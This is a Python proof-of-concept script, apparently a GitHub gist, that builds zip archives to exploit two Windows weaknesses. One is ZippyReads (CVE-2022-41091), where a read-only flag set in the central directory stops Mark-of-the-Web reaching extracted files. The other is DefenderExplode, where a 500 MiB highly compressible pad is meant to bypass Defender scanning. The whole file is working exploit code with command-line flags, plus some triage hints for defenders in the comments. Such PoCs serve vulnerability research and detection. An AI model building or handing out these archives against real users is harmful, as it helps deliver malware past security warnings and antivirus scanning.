
@rxwx
Created December 1, 2022 14:46
DefenderExplode & ZippyReads PoC
from zipfile import ZipFile, ZIP_DEFLATED
import argparse
import tempfile
import os
import shutil
def explode_file(filename):
    """Append a 500 MiB (524288000-byte) run of one repeated byte to *filename*.

    The pad is a single byte from ``os.urandom`` repeated, so it deflates to
    almost nothing inside the archive while the extracted file becomes large.
    The file is opened in append mode, so the original content is preserved
    and the pad is trailing data.

    From a triage standpoint the artifact is distinctive: an extreme
    compression ratio on the zip entry and a long trailing run of a single
    byte value in the extracted file.

    Args:
        filename: path of the file to pad in place.

    Returns:
        The same *filename* that was passed in.
    """
    with open(filename, 'ab') as tmp:
        # The 500 MiB bytes object is materialised in memory before the
        # single write call.
        tmp.write(os.urandom(1) * 524288000)
    return filename
def build_zip(filename, outfile, readonly=False, explode=False):
    """Copy *filename* into a temp dir, optionally pad it, and zip it to *outfile*.

    Args:
        filename: path of the file to archive.
        outfile: path of the zip file to create.
        readonly: if True, set the entry's central-directory attributes so
            the extracted file is marked read-only (the ZippyReads /
            CVE-2022-41091 case referenced in the CLI help).
        explode: if True, append the large compressible pad via
            ``explode_file`` before archiving.

    The working copy lives in a ``TemporaryDirectory`` so the caller's
    original file is never modified; the directory is removed on exit.
    """
    with tempfile.TemporaryDirectory() as tmpdir:
        filename = shutil.copyfile(filename, os.path.join(
            tmpdir, os.path.basename(filename)))
        if explode:
            print ('Exploding file')
            explode_file(filename)
        with ZipFile(outfile, 'w', ZIP_DEFLATED) as zf:
            # Written with the default arcname, i.e. the path of the temp
            # copy (drive and leading separator stripped). The local file
            # header is emitted at this point with that name.
            zf.write(filename)
            for zinfo in zf.infolist():
                # Renames the entry after its local header has been written;
                # only the central directory (emitted at close) sees the new
                # name, so the local header presumably still carries the temp
                # path. A local-header / central-directory name mismatch is a
                # useful triage indicator for archives built this way.
                zinfo.filename = os.path.basename(zinfo.filename)
                if readonly and not zinfo.is_dir():
                    print ('Adding readonly flag')
                    # create_system is the "version made by" host-OS byte of
                    # the central-directory record. external_attr's low byte
                    # is the DOS attribute field: 33 == 0x21 ==
                    # FILE_ATTRIBUTE_READONLY (0x01) | FILE_ATTRIBUTE_ARCHIVE
                    # (0x20). Both are written only in the central directory.
                    zinfo.create_system = 1
                    zinfo.external_attr = 33
    print (f"Wrote zip file: {outfile}")
def add_motw(filename):
    """Stamp *filename* with a Mark-of-the-Web for testing.

    Writes the NTFS alternate data stream ``Zone.Identifier`` containing
    ``ZoneId=3`` (URLZONE_INTERNET), the same marker browsers and mail
    clients attach to downloaded files. This is the attribute whose
    propagation to the extracted file the PoC is checking for.

    The ``file:stream:$DATA`` syntax is NTFS-specific; on other
    filesystems the colon is presumably an ordinary path character and
    this would create a separately named file rather than a stream.

    Args:
        filename: path of the (already written) file to mark.
    """
    with open(filename + ':Zone.Identifier:$DATA', 'w') as f:
        f.write('[ZoneTransfer]\nZoneId=3')
    print ("Added MOTW for testing")
if __name__ == '__main__':
    # CLI entry point: build the archive first, then stamp the finished zip
    # with a Zone.Identifier stream so the extract-and-propagate path is
    # exercised end to end.
    parser = argparse.ArgumentParser(description="ZippyReads & DefenderExplode PoC")
    parser.add_argument("input_file", help="File to ZIP")
    parser.add_argument("output_file", help="Output ZIP file")
    parser.add_argument("-r", "--readonly",
        help="Exploit ZippyReads (CVE-2022-41091). Adds readonly flag",
        action="store_true", default=False
    )
    parser.add_argument("-e", "--explode",
        # Implicit string concatenation: the rendered help text reads
        # "DefenderExplode.Pads ..." with no space after the period.
        help="Exploit DefenderExplode." \
        "Pads the file with highly-compressable content to bypass Defender",
        action="store_true", default=False)
    args = parser.parse_args()
    build_zip(args.input_file, args.output_file, args.readonly, args.explode)
    # The MOTW stream is attached to the archive itself, not to its contents.
    add_motw(args.output_file)